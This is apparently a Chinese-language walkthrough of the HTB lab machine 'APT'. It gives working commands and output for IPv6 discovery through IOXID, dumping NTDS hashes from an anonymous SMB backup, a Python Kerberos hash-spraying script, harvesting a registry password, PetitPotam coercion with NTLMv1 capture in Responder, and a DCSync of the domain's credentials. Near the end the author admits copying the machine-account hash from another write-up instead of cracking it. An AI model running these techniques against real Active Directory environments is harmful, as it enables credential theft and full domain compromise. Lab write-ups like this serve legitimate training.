Tracks-AD-APT

Nmap

└─$ sudo nmap -sS 10.10.10.213 -p- --min-rate=3000

PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc  

User

80/http

80 web，内容如下

整个web没有存在价值的东西，support页面的contact部分在提交请求时会跳转到 10.13.38.16这个ip

https://10.13.38.16/contact-post.html

看源码这部分显示是个打包器的，这ip应该是打包时候的测试环境ip

135/tcp

135端口是msrpc口子

这里用rpcmap解析下

└─$ impacket-rpcmap 'ncacn_ip_tcp:10.10.10.213[135]'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1

Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2

Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0

Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0

更详细的话用rpcdump解析了但是也详细不到哪去，这里就不搞了

其中有几个dcom点位暴露出来了

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0

可以查下对应关系

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/c25391af-f59e-40da-885e-cc84076673e4

IID_IRemoteSCMActivator	{000001A0-0000-0000-C000-000000000046}	RPC interface UUID for IRemoteSCMActivator	3.1.2.5.2.2
IID_IActivation	{4d9f4ab8-7d1c-11cf-861e-0020af6e7c57}	RPC interface UUID for IActivation	3.1.2.5.2.1
IID_IObjectExporter	{99fcfec4-5260-101b-bbcb-00aa0021347a}	RPC interface UUID for IObjectExporter	3.1.2.5.1

在挨个搜索到这里面的 IID_IObjectExporter 和它对应的uuid时找到了这两篇

https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html

https://www.thehacker.recipes/ad/recon/ms-rpc

project0这个讲提权的用不太到，重点关注下thehacker的这篇

这里说需要IObjectExporter调用他的 ServerAlive2() 方法，就可以获取计算机的网络接口说是。

所以需要看他这个方法注册了没

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/c898afd6-b75d-4641-a2cd-b50cb9f5556d

说是 The ServerAlive2 (Opnum 5)

└─$ impacket-rpcmap 'ncacn_ip_tcp:10.10.10.213[135]' -opnum-max 5 -brute-opnums 

IObjectExporter 的 opnum5 可以访问，也就这个说明能用

└─$ python3 IOXIDResolver.py -t 10.10.10.213       
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::50:f3c0:323b:e1a6
Address: dead:beef::b885:d62a:d679:573f

额外获取到俩ipv6

然后再一次nmap，这次能扫出东西了

└─$ sudo nmap dead:beef::50:f3c0:323b:e1a6 -6 -sS -p- --min-rate=3000
Nmap scan report for dead:beef::50:f3c0:323b:e1a6
Host is up (0.10s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49673/tcp open  unknown
49685/tcp open  unknown
49706/tcp open  unknown

ldap

└─$ ldapsearch -x -H 'ldap://[dead:beef::50:f3c0:323b:e1a6]'  -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20250603083652.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=APT,CN=Servers,CN=Default-First-Site-Name,C
 N=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 118893
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: apt.htb.local
ldapServiceName: htb.local:apt$@HTB.LOCAL
serverName: CN=APT,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configura
 tion,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

dc应该是 apt.htb.local ，域名 htb.local，加host

└─$ smbclient -L \\apt.htb.local -U '' -N

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

匿名访问smb

smb允许匿名访问，并且共享了一个 backup 目录给匿名用户

└─$ impacket-smbclient ''@apt.htb.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw-          0  Thu Sep 24 03:31:03 2020 .
drw-rw-rw-          0  Thu Sep 24 03:31:03 2020 ..
-rw-rw-rw-   10650961  Thu Sep 24 03:31:03 2020 backup.zip

backup.zip 是个ntd的转储

└─$ zipinfo backup.zip 
Archive:  backup.zip
Zip file size: 10650961 bytes, number of entries: 6
drwx---     6.3 fat        0 bx stor 20-Sep-23 19:40 Active Directory/
-rw----     6.3 fat 50331648 Bx defN 20-Sep-23 19:38 Active Directory/ntds.dit
-rw----     6.3 fat    16384 Bx defN 20-Sep-23 19:38 Active Directory/ntds.jfm
drwx---     6.3 fat        0 bx stor 20-Sep-23 19:40 registry/
-rw----     6.3 fat   262144 Bx defN 20-Sep-23 19:22 registry/SECURITY
-rw----     6.3 fat 12582912 Bx defN 20-Sep-23 19:22 registry/SYSTEM

zip2john导出一下hash，跑出来压缩包密码。

iloveyousomuch

获取可用账户

导一下hash

impacket-secretsdump LOCAL -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY  > hash

导出来的凭据忒多，看了下大

└─$ head -30 hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:34005b00250066006f0027007a004700600026004200680052003300630050005b002900550032004e00560053005c004c00450059004f002f0026005e0029003c00390078006a0036002500230039005c005c003f0075004a0034005900500062006000440052004b00220020004900450053003200660058004b00220066002c005800280051006c002a0066006700300052006600520071003d0021002c004200650041005600460074005e0045005600520052002d004c0029005600610054006a0076002f005100470039003d006f003b004700400067003e005600610062002d00550059006300200059006400
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb
[*] DefaultPassword 
(Unknown User):Password123!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3e0d78cb8f3ed66196584c44b5701501789fc102
dpapi_userkey:0xdcde3fc585c430a72221a48691fb202218248d46
[*] NL$KM 
 0000   73 4F 34 1D 09 C8 F9 32  23 B9 25 0B DF E2 DC 58   sO4....2#.%....X
 0010   44 41 F2 E0 C0 93 CF AD  2F 2E EB 13 81 77 4B 42   DA....../....wKB
 0020   C2 E0 6D DE 90 79 44 42  F4 C2 AD 4D 7E 3C 6F B2   ..m..yDB...M~<o.
 0030   39 CE 99 95 66 8E AF 7F  1C E0 F6 41 3A 25 DA A8   9...f......A:%..
NL$KM:734f341d09c8f93223b9250bdfe2dc584441f2e0c093cfad2f2eeb1381774b42c2e06dde90794442f4c2ad4d7e3c6fb239ce9995668eaf7f1ce0f6413a25daa8
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
jeb.sloan:3200:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30:::
ranson.mejia:3201:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab:::

8k多条挨个登陆验证不显示

└─$ wc -l hash                     
8021 hash

所以验证的话还是首先验证用户是否存在

在这之前先同步下时间，不知道为什么ntpdate一直报错

所以用web的返回时间同步

─$ curl 10.10.10.213 -sv|head -10
*   Trying 10.10.10.213:80...
* Connected to 10.10.10.213 (10.10.10.213) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.10.213
> User-Agent: curl/8.11.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: text/html
< Last-Modified: Mon, 23 Dec 2019 11:29:26 GMT
< Accept-Ranges: bytes
< ETag: "0ef5b3b84b9d51:0"
< Server: Microsoft-IIS/10.0
< Date: Thu, 01 Jun 2025 07:21:29 GMT
< Content-Length: 14879
< 
{ [3776 bytes data]
<!--
Author: W3layouts
Author URL: http://w3layouts.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!DOCTYPE HTML>
<html>

<!-- Mirrored from 10.13.38.16/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:12:54 GMT -->
s* Failure writing output to destination, passed 2668 returned 1842
* closing connection #0

└─$ sudo date -s "Thu, 01 Jun 2025 07:21:22 GMT"
[sudo] password for fonllge: 
Thu Jun  1 03:21:22 EDT 2025

然后将筛选出的用户跑一下

└─$ kerbrute userenum --dc apt.htb -d htb.local users    

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/01/25 - Ronnie Flathers @ropnop

2025/06/01 13:41:50 >  Using KDC(s):
2025/06/01 13:41:50 >   apt.htb:88

2025/06/01 13:41:56 >  [+] VALID USERNAME:       Administrator@htb.local
2025/06/01 13:41:56 >  [+] VALID USERNAME:       APT$@htb.local
2025/06/01 13:45:51 >  [+] VALID USERNAME:       henry.vinson@htb.local

这只跑出来仨账户，说明确实并非导出凭据内的用户此刻都还在这个域中，仅留了一个 henry.vinson 。

撞 henry.vinson 账户可用 hash

尝试用他的账户hash进行登录，会报凭据不对

└─$ impacket-getTGT 'htb.local/henry.vinson' -hashes :2de80758521541d19cabba480b260e8f -dc-ip apt.htb.local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

其他两个账户同样也是登录不上，既然历史的登陆hash不上那这里优先考虑用其他账户的hash来撞。

kerbrute不支持直接通过hash进行撞凭证的方式。

xct的wp中是通过修改了下方的脚本来实现撞hash

https://github.com/cube0x0/HashSpray.py

这里采取了一样的方式，这里还可以用bash来跑impacket-tgt，不过py确实方便些

#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import argparse
import sys
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
from impacket.krb5 import constants
from impacket.krb5.types import Principal
import multiprocessing
import socket
import os

DOMAIN = "htb.local"
username = "henry.vinson"
hashfile = "/Desktop/htb/APT/hashes"

def login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
    try:
        dc_ip = "dead:beef::5c15:ad15:b39b:b275"
        kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        getKerberosTGT(kerb_principal, password, domain,
            unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
        print('[+]Success %s/%s' % (domain, username))
        return True  
    except KerberosError as e:
        if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
           print("[-]Could not find username: %s/%s" % (domain, username))
        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
            return False
        else:
            print(e)
            return False
    except socket.error as e:
        print('[-]Could not connect to DC')
        return False

def _login(username, hash):
    return login(username, '', DOMAIN, '', hash, None, "apt.htb")

passwords = [x.strip() for x in open(hashfile, "r").readlines()]

for i in passwords:
    # print(i)
    if _login(username, i):
        print("[+]Success %s,%s" % (username, i))
        exit()  

等了蛮久得到一个可用hash

└─$ python3 kerbspray.py
[+]Success htb.local/henry.vinson
[+]Success henry.vinson,e53d87d42adaa3ca32bdb34a876cbffb

远程读取注册表获取 henry.vinson_adm 凭证

但是这个账户没有winrm等访问权限。

这部分看了 0xdf 的wp

是通过远程读取 HKEY_CURRENT_USER 注册表

说实话能没想到注册表里还会有能用的东西..

对于注册表可以参考微软的下文

https://learn.microsoft.com/zh-tw/troubleshoot/windows-server/performance/windows-registry-advanced-users

导出所有HKCU的注册表（）

└─$ impacket-reg -debug htb.local/henry.vinson@htb.local -hashes :e53d87d42adaa3ca32bdb34a876cbffb  query -keyName HKCU -s > reg

HKEY_CURRENT_USER 針對目前登入的使用者，包含設定資訊根目錄。 使用者的資料夾、螢幕色彩和控制面板設定會儲存在這裡。 此資訊連結使用者的設定檔。 此金鑰有時會縮寫為 HKCU。

grep关键字，会发现在其中有个 GiganticHostingManagementSystem 里面放了俩key,其中包含一个账户密码。

└─$ grep -i -a password reg -A5 -B5
\Keyboard Layout\Toggle\
\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\
\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}\
        Version REG_SZ   10,0,14393,4283

GetUser

使用得到的 henry.vinson_adm 账户登录

henry.vinson_adm / G1#Ny5@2dvht

└─$ evil-winrm -u henry.vinson_adm -p 'G1#Ny5@2dvht'  -i apt.htb.local

Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c set computer
COMPUTERNAME=APT

*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cat u*
79ad7bd3345b34f9d4a1c2ac6e8d97b7

Root

查看当前用户配置

*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\local> Get-PSReadLineOption
EditMode                               : Windows
ContinuationPrompt                     : >>
ContinuationPromptForegroundColor      : Gray
ContinuationPromptBackgroundColor      : Black
ExtraPromptLineCount                   : 0
AddToHistoryHandler                    :
CommandValidationHandler               :
CommandsToValidateScriptBlockArguments : {ForEach-Object, %, Invoke-Command, icm...}
HistoryNoDuplicates                    : False
MaximumHistoryCount                    : 4096
MaximumKillRingCount                   : 10
HistorySearchCursorMovesToEnd          : False
ShowToolTips                           : False
DingTone                               : 1221
CompletionQueryItems                   : 100
WordDelimiters                         : ;:,.[]{}()/\|^&*-=+'"–—―
DingDuration                           : 50
BellStyle                              : Audible
HistorySearchCaseSensitive             : False                                            
ViModeIndicator                        : None
HistorySavePath                        : C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt

访问命令执行记录查看到，之前这个账户用administrator用户的凭证执行过注册表的变更

*Evil-WinRM* PS C:\Users\henry.vinson_adm\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline> cat ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

翻了下文档

https://learn.microsoft.com/zh-tw/troubleshoot/windows-client/windows-security/enable-ntlm-2-authentication

这个是通过admin用户修改了Lsa注册表内 lmcompatibilitylevel的值为2，这个对应的如下

層級 2 - 僅傳送 NTLM 回應。 用戶端只使用 NTLM 驗證，並在伺服器支援時使用 NTLM 2 工作階段安全性;域控制器接受 LM、NTLM 和 NTLM 2 驗證。

也就是会使用 ntlmv1来进行身份验证，那必然是相对ntlmv2来说会肥肠容易破解

但是这该如何利用，如何触发一个高权重的账户发起客户端的验证请求，至我的kali来捕获这个请求的ntlmv1

这里跟着 0xdf 的说法是作者本意是想让用 rogue potato，所以这里也搞一下。

因为我没用过，所以下面都是跟着 0xdf 做的

按照其说法这里主要用的是 rogue potato 会触发以system用户的smb身份验证的行为

https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

通过阅读文章，发现应该是这部分应该通过”"来实现自定义请求主机的网络路径，所以走的smb

When we read the PrintSpoofer post we were impressed by clever trick of the named pipe validation path bypass (credits to @itm4n and @jonasLyk) where inserting ‘/’ in the hostname will be converted in partial path of the named pipe!

With that in mind we returned the following binding information:

ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]

And you know what? The RPCSS were trying to connect to nonexistent named pipe \roguepotato\pipe\epmapper :

先改一下ipv6的支持

也是同样更新 IStorageTrigger.cpp 文件的这个部分 ，让其能够支持ipv6（因为靶机的ipv4没有作为主出口，所以要走v6来发起客户端请求，于是这里就要改为v6了）

在这里ippsec遇到了df所以还演示了一下怎么过av

https://youtu.be/eRnqtXwCZVs

奇怪的是我运行的时候用 responder 接不到请求

查了下是支持ipv6的

https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html

但是不知道为啥呢..

所以按照0xdf的方式弄个rpc客户端

去clone了个新的impacket，然后发现好像没有rpcserver这个脚本，所以需要下载再patch下

└─$  wget https://gist.githubusercontent.com/Gilks/0fc75929faba704c05143b01f34c291b/raw/e1455b82d4a7ba23998151c28abc66f7e18a8e75/rpcrelayclientserver.patch

└─$ git apply --whitespace=fix --reject rpcrelayclientserver.patch

再次查询现在就有了

└─$ find .|grep rpcrela                                           
./impacket/examples/ntlmrelayx/servers/rpcrelayserver.py
./impacket/examples/ntlmrelayx/clients/rpcrelayclient.py
./rpcrelayclientserver.patch

也是将 impacket/examples/ntlmrelayx/servers/rpcrelayserver.py 这部分修改一下

因为没给他转发目标的参（也不需要再转了），所以不改的话会报这个

特么这里捯饬半天也不对，啊啊啊啊啊啊啊啊啊啊，这啊啊啊啊啊啊啊啊啊啊self和target的传参有问题导致结构体里的netloc不对，可能是我的impacket版本问题草了。

root route2 - PetitPotam

类似的思路不过这里我用 PetitPotam 做的，反正既然他主机上已经强制ntlmv1了，那只要能主机触发请求就完事

依照crash.sh ntlmv1的要求

修改 /etc/responder/Responder.conf 中的挑战值为 1122334455667788（默认为random）

sudo vim /etc/responder/Responder.conf 

修改如下

Challenge = 1122334455667788

然后再起监听

sudo responder -I tun0 --lm  -v 

用小河马触发主机请求

└─$ python3 PetitPotam.py -u henry.vinson_adm -p 'G1#Ny5@2dvht' -d htb.local -dc-ip apt.htb.local 10.10.16.14  'dead:beef::5c15:ad15:b39b:b275'

              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:dead:beef::5c15:ad15:b39b:b275[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

get了

APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

然后拿去crash.sh解密即可（不过站点维护了解不了了..）

找到个ntlmv1-multi能帮着转换一下

└─$ python3 ntlmv1.py --ntlmv1 'APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788'
Hashfield Split:
['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788']

Hostname: HTB
Username: APT$
Challenge: 1122334455667788
LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
CT1: 95ACA8C7248774CB
CT2: 427E1AE5B8D5CE68
CT3: 30A49B5BB858D384                                                                     

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788

To crack with hashcat create a file with the following contents:
95ACA8C7248774CB:1122334455667788
427E1AE5B8D5CE68:1122334455667788

echo "95ACA8C7248774CB:1122334455667788">>14000.hash
echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash                                      

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

Once complete run output through deskey_to_ntlm.pl

然后特么跑十来分钟了还没出我还要上厕所，直接去找个wp拿一下nthash

└─$ impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
